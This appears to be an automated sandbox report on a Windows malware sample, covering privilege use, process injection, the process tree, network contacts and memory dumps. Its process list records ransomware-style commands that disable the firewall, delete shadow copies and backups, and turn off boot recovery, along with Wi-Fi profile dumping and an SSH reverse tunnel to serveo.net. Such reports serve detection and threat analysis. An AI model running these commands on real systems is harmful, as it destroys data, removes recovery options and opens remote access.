Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\6E45.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\73A6.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\75DA.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\705A.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\781D.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\explorer.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3796 wrote to memory of 4148 N/A C:\Users\Admin\AppData\Local\Temp\65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe C:\Users\Admin\AppData\Local\Temp\65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe
PID 3796 wrote to memory of 4148 N/A C:\Users\Admin\AppData\Local\Temp\65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe C:\Users\Admin\AppData\Local\Temp\65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe
PID 3796 wrote to memory of 4148 N/A C:\Users\Admin\AppData\Local\Temp\65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe C:\Users\Admin\AppData\Local\Temp\65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe
PID 3796 wrote to memory of 4256 N/A C:\Users\Admin\AppData\Local\Temp\65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe C:\Users\Admin\AppData\Local\Temp\65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe
PID 3796 wrote to memory of 4256 N/A C:\Users\Admin\AppData\Local\Temp\65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe C:\Users\Admin\AppData\Local\Temp\65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe
PID 3796 wrote to memory of 4256 N/A C:\Users\Admin\AppData\Local\Temp\65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe C:\Users\Admin\AppData\Local\Temp\65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe
PID 3796 wrote to memory of 4256 N/A C:\Users\Admin\AppData\Local\Temp\65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe C:\Users\Admin\AppData\Local\Temp\65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe
PID 3796 wrote to memory of 4256 N/A C:\Users\Admin\AppData\Local\Temp\65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe C:\Users\Admin\AppData\Local\Temp\65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe
PID 3796 wrote to memory of 4256 N/A C:\Users\Admin\AppData\Local\Temp\65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe C:\Users\Admin\AppData\Local\Temp\65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe
PID 3796 wrote to memory of 4256 N/A C:\Users\Admin\AppData\Local\Temp\65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe C:\Users\Admin\AppData\Local\Temp\65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe
PID 3796 wrote to memory of 4256 N/A C:\Users\Admin\AppData\Local\Temp\65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe C:\Users\Admin\AppData\Local\Temp\65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe
PID 4256 wrote to memory of 4796 N/A C:\Users\Admin\AppData\Local\Temp\65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe C:\Windows\system32\certreq.exe
PID 4256 wrote to memory of 4796 N/A C:\Users\Admin\AppData\Local\Temp\65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe C:\Windows\system32\certreq.exe
PID 4256 wrote to memory of 4796 N/A C:\Users\Admin\AppData\Local\Temp\65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe C:\Windows\system32\certreq.exe
PID 4256 wrote to memory of 4796 N/A C:\Users\Admin\AppData\Local\Temp\65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe C:\Windows\system32\certreq.exe
PID 3176 wrote to memory of 212 N/A C:\Users\Admin\AppData\Local\Microsoft\pZW}X.exe C:\Users\Admin\AppData\Local\Microsoft\pZW}X.exe
PID 3176 wrote to memory of 212 N/A C:\Users\Admin\AppData\Local\Microsoft\pZW}X.exe C:\Users\Admin\AppData\Local\Microsoft\pZW}X.exe
PID 3176 wrote to memory of 212 N/A C:\Users\Admin\AppData\Local\Microsoft\pZW}X.exe C:\Users\Admin\AppData\Local\Microsoft\pZW}X.exe
PID 3176 wrote to memory of 212 N/A C:\Users\Admin\AppData\Local\Microsoft\pZW}X.exe C:\Users\Admin\AppData\Local\Microsoft\pZW}X.exe
PID 3176 wrote to memory of 212 N/A C:\Users\Admin\AppData\Local\Microsoft\pZW}X.exe C:\Users\Admin\AppData\Local\Microsoft\pZW}X.exe
PID 3176 wrote to memory of 212 N/A C:\Users\Admin\AppData\Local\Microsoft\pZW}X.exe C:\Users\Admin\AppData\Local\Microsoft\pZW}X.exe
PID 1508 wrote to memory of 3548 N/A C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe
PID 1508 wrote to memory of 3548 N/A C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe
PID 1508 wrote to memory of 3548 N/A C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe
PID 1508 wrote to memory of 3548 N/A C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe
PID 1508 wrote to memory of 3548 N/A C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe
PID 1508 wrote to memory of 3548 N/A C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe
PID 1508 wrote to memory of 3548 N/A C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe
PID 1508 wrote to memory of 3548 N/A C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe
PID 1508 wrote to memory of 3548 N/A C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe
PID 1508 wrote to memory of 3548 N/A C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe
PID 1516 wrote to memory of 2184 N/A C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe
PID 1516 wrote to memory of 2184 N/A C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe
PID 1516 wrote to memory of 2184 N/A C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe
PID 1516 wrote to memory of 2184 N/A C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe
PID 1516 wrote to memory of 2184 N/A C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe
PID 1516 wrote to memory of 2184 N/A C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe
PID 1516 wrote to memory of 2184 N/A C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe
PID 1516 wrote to memory of 2184 N/A C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe
PID 1516 wrote to memory of 2184 N/A C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe
PID 1516 wrote to memory of 2184 N/A C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe
PID 3548 wrote to memory of 2880 N/A C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe C:\Windows\system32\cmd.exe
PID 3548 wrote to memory of 2880 N/A C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe C:\Windows\system32\cmd.exe
PID 3548 wrote to memory of 4736 N/A C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe C:\Windows\system32\cmd.exe
PID 3548 wrote to memory of 4736 N/A C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe C:\Windows\system32\cmd.exe
PID 4736 wrote to memory of 3320 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 4736 wrote to memory of 3320 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2880 wrote to memory of 3740 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2880 wrote to memory of 3740 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2880 wrote to memory of 3716 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2880 wrote to memory of 3716 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4736 wrote to memory of 4392 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 4736 wrote to memory of 4392 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2880 wrote to memory of 2516 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 2880 wrote to memory of 2516 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 2880 wrote to memory of 1348 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 2880 wrote to memory of 1348 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 2880 wrote to memory of 276 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wbadmin.exe
PID 2880 wrote to memory of 276 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wbadmin.exe
PID 3196 wrote to memory of 3756 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\6E45.exe
PID 3196 wrote to memory of 3756 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\6E45.exe
PID 3196 wrote to memory of 3756 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\6E45.exe
PID 3196 wrote to memory of 1080 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\705A.exe
PID 3196 wrote to memory of 1080 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\705A.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe N/A

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe

"C:\Users\Admin\AppData\Local\Temp\65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe"

C:\Users\Admin\AppData\Local\Temp\65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe

C:\Users\Admin\AppData\Local\Temp\65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe

C:\Users\Admin\AppData\Local\Temp\65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe

C:\Users\Admin\AppData\Local\Temp\65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe

C:\Windows\system32\certreq.exe

"C:\Windows\system32\certreq.exe"

C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe

"C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe"

C:\Users\Admin\AppData\Local\Microsoft\pZW}X.exe

"C:\Users\Admin\AppData\Local\Microsoft\pZW}X.exe"

C:\Users\Admin\AppData\Local\Microsoft\pZW}X.exe

C:\Users\Admin\AppData\Local\Microsoft\pZW}X.exe

C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe

C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe

C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe

"C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe"

C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe

C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe"

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\vssadmin.exe

vssadmin delete shadows /all /quiet

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\System32\Wbem\WMIC.exe

wmic shadowcopy delete

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=disable

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled no

C:\Windows\system32\wbadmin.exe

wbadmin delete catalog -quiet

C:\Windows\system32\wbengine.exe

"C:\Windows\system32\wbengine.exe"

C:\Windows\System32\vdsldr.exe

C:\Windows\System32\vdsldr.exe -Embedding

C:\Windows\System32\vds.exe

C:\Windows\System32\vds.exe

C:\Users\Admin\AppData\Local\Temp\6E45.exe

C:\Users\Admin\AppData\Local\Temp\6E45.exe

C:\Users\Admin\AppData\Local\Temp\705A.exe

C:\Users\Admin\AppData\Local\Temp\705A.exe

C:\Users\Admin\AppData\Local\Temp\6E45.exe

C:\Users\Admin\AppData\Local\Temp\6E45.exe

C:\Users\Admin\AppData\Local\Temp\75DA.exe

C:\Users\Admin\AppData\Local\Temp\75DA.exe

C:\Users\Admin\AppData\Local\Temp\73A6.exe

C:\Users\Admin\AppData\Local\Temp\73A6.exe

C:\Users\Admin\AppData\Local\Temp\781D.exe

C:\Users\Admin\AppData\Local\Temp\781D.exe

C:\Users\Admin\AppData\Local\Temp\6E45.exe

C:\Users\Admin\AppData\Local\Temp\6E45.exe

C:\Users\Admin\AppData\Local\Temp\8405.exe

C:\Users\Admin\AppData\Local\Temp\8405.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Users\Admin\AppData\Local\Temp\Ynigope.exe

"C:\Users\Admin\AppData\Local\Temp\Ynigope.exe"

C:\Users\Admin\AppData\Local\Temp\Ynigope.exe

"C:\Users\Admin\AppData\Local\Temp\Ynigope.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 548 -ip 548

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 548 -s 1968

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\chcp.com

chcp 65001

C:\Users\Admin\AppData\Local\Temp\705A.exe

"C:\Users\Admin\AppData\Local\Temp\705A.exe"

C:\Windows\SysWOW64\netsh.exe

netsh wlan show profiles

C:\Windows\SysWOW64\findstr.exe

findstr /R /C:"[ ]:[ ]"

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 548 -ip 548

C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe

"C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:2936 serveo.net

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 548 -s 1988

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\SysWOW64\chcp.com

chcp 65001

C:\Windows\SysWOW64\netsh.exe

netsh wlan show networks mode=bssid

C:\Windows\SysWOW64\findstr.exe

findstr "SSID BSSID Signal"

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Users\Admin\AppData\Local\Temp\C176.tmp\svchost.exe

C:\Users\Admin\AppData\Local\Temp\C176.tmp\svchost.exe -debug

C:\Windows\system32\wbem\WmiApSrv.exe

C:\Windows\system32\wbem\WmiApSrv.exe

C:\Windows\SYSTEM32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\C176.tmp\aa_nts.dll",run

Network

Country Destination Domain Proto
US 8.8.8.8:53 208.194.73.20.in-addr.arpa udp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 126.22.238.8.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 198.1.85.104.in-addr.arpa udp
US 8.8.8.8:53 54.120.234.20.in-addr.arpa udp
US 8.8.8.8:53 amxt25.xyz udp
DE 45.131.66.61:80 amxt25.xyz tcp
US 8.8.8.8:53 61.66.131.45.in-addr.arpa udp
US 8.8.8.8:53 158.240.127.40.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
DE 45.131.66.61:80 amxt25.xyz tcp
US 8.8.8.8:53 192.240.110.104.in-addr.arpa udp
DE 45.131.66.61:80 amxt25.xyz tcp
DE 45.131.66.61:80 amxt25.xyz tcp
US 8.8.8.8:53 servermlogs27.xyz udp
DE 45.131.66.120:80 servermlogs27.xyz tcp
US 8.8.8.8:53 mksad917.xyz udp
DE 193.31.28.70:80 mksad917.xyz tcp
US 8.8.8.8:53 120.66.131.45.in-addr.arpa udp
US 8.8.8.8:53 70.28.31.193.in-addr.arpa udp
US 8.8.8.8:53 cdn1.frocdn.ch udp
US 188.114.96.0:443 cdn1.frocdn.ch tcp
US 8.8.8.8:53 0.96.114.188.in-addr.arpa udp
US 8.8.8.8:53 transfer.sh udp
DE 144.76.136.153:443 transfer.sh tcp
US 8.8.8.8:53 qu.ax udp
IL 91.226.72.136:443 qu.ax tcp
IL 91.226.72.136:443 qu.ax tcp
IL 91.226.72.136:443 qu.ax tcp
US 8.8.8.8:53 153.136.76.144.in-addr.arpa udp
US 8.8.8.8:53 136.72.226.91.in-addr.arpa udp
IL 91.226.72.136:443 qu.ax tcp
DE 45.131.66.120:80 servermlogs27.xyz tcp
US 8.8.8.8:53 github.com udp
US 140.82.112.3:443 github.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 3.112.82.140.in-addr.arpa udp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 serveo.net udp
DE 159.89.214.31:22 serveo.net tcp
US 8.8.8.8:53 31.214.89.159.in-addr.arpa udp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 220.167.154.149.in-addr.arpa udp
GB 217.145.238.175:80 217.145.238.175 tcp
FI 135.181.98.45:8888 135.181.98.45 tcp
US 8.8.8.8:53 45.98.181.135.in-addr.arpa udp
US 8.8.8.8:53 175.238.145.217.in-addr.arpa udp
FI 65.108.226.108:8080 65.108.226.108 tcp
FR 45.155.171.134:8080 45.155.171.134 tcp
US 8.8.8.8:53 108.226.108.65.in-addr.arpa udp
US 8.8.8.8:53 134.171.155.45.in-addr.arpa udp
DE 45.131.66.120:80 servermlogs27.xyz tcp
US 8.8.8.8:53 rl.ammyy.com udp
NL 188.42.129.148:80 rl.ammyy.com tcp
DE 136.243.104.242:443 tcp
DE 45.131.66.120:80 servermlogs27.xyz tcp
US 8.8.8.8:53 148.129.42.188.in-addr.arpa udp
US 8.8.8.8:53 242.104.243.136.in-addr.arpa udp
NL 149.154.167.220:443 api.telegram.org tcp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 www.ammyy.com udp
DE 136.243.18.118:80 www.ammyy.com tcp
N/A 127.0.0.1:2936 tcp
DE 136.243.18.118:443 www.ammyy.com tcp
US 8.8.8.8:53 118.18.243.136.in-addr.arpa udp
US 8.8.8.8:53 147.174.42.23.in-addr.arpa udp
US 8.8.8.8:53 176.25.221.88.in-addr.arpa udp

Files

memory/3796-0-0x0000000074940000-0x00000000750F0000-memory.dmp

memory/3796-1-0x0000000000C00000-0x0000000000DE6000-memory.dmp

memory/3796-2-0x00000000058B0000-0x0000000005928000-memory.dmp

memory/3796-3-0x0000000005940000-0x0000000005950000-memory.dmp

memory/3796-4-0x0000000005950000-0x00000000059B8000-memory.dmp

memory/3796-5-0x00000000059C0000-0x0000000005A0C000-memory.dmp

memory/3796-6-0x0000000005FF0000-0x0000000006594000-memory.dmp

memory/4256-7-0x0000000000400000-0x0000000000473000-memory.dmp

memory/4256-10-0x0000000000400000-0x0000000000473000-memory.dmp

memory/3796-12-0x0000000074940000-0x00000000750F0000-memory.dmp

memory/4256-11-0x0000000000400000-0x0000000000473000-memory.dmp

memory/4256-13-0x0000000001040000-0x0000000001047000-memory.dmp

memory/4256-15-0x0000000002DD0000-0x00000000031D0000-memory.dmp

memory/4256-16-0x0000000002DD0000-0x00000000031D0000-memory.dmp

memory/4256-14-0x0000000002DD0000-0x00000000031D0000-memory.dmp

memory/4256-17-0x0000000002DD0000-0x00000000031D0000-memory.dmp

memory/4796-18-0x0000023DFC440000-0x0000023DFC443000-memory.dmp

memory/4256-19-0x0000000000400000-0x0000000000473000-memory.dmp

memory/4256-20-0x0000000003B50000-0x0000000003B86000-memory.dmp

memory/4256-26-0x0000000003B50000-0x0000000003B86000-memory.dmp

memory/4256-27-0x0000000002DD0000-0x00000000031D0000-memory.dmp

memory/4256-28-0x0000000000400000-0x0000000000473000-memory.dmp

memory/4256-29-0x0000000002DD0000-0x00000000031D0000-memory.dmp

memory/4796-30-0x0000023DFC440000-0x0000023DFC443000-memory.dmp

memory/4796-31-0x0000023DFC800000-0x0000023DFC807000-memory.dmp

memory/4796-33-0x00007FF4E78A0000-0x00007FF4E79CF000-memory.dmp

memory/4796-32-0x00007FF4E78A0000-0x00007FF4E79CF000-memory.dmp

memory/4796-34-0x00007FF4E78A0000-0x00007FF4E79CF000-memory.dmp

